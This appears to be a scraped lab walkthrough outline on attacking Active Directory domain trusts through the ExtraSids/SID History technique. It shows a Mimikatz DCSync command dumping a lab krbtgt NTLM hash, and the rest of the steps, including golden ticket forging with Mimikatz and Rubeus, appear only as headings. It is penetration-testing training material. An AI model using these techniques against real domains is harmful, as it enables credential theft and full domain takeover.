πͺAttacking Domain Trusts From Windows
SID History
ExtraSids Attack β MimiKatz
Obtaining the KRBTGT Account's NT Hash
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
[DC] 'LOGISTICS.INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'LOGISTICS\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/1/2021 11:21:33 AM
Object Security ID : S-1-5-21-2806153819-209893948-922872689-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9d765b482771505cbe97411065964d5f
ntlm- 0: 9d765b482771505cbe97411065964d5f
lm - 0: 69df324191d4a80f0ed100c10f20561eUsing Get-DomainSID
Obtaining Enterprise Admins Group's SID using Get-DomainGroup
Data Points So Far
Using ls to Confirm No Access
Creating a Golden Ticket with Mimikatz
Confirming Ticket is in Memory
Lisiting the Entire C: Drive of the DC
ExtraSids Attack β Rubeus
Creating a Golden Ticket Using Rubeus
Confirming the Ticket is in Memory using klist
Performing a DCSync Attack
Last updated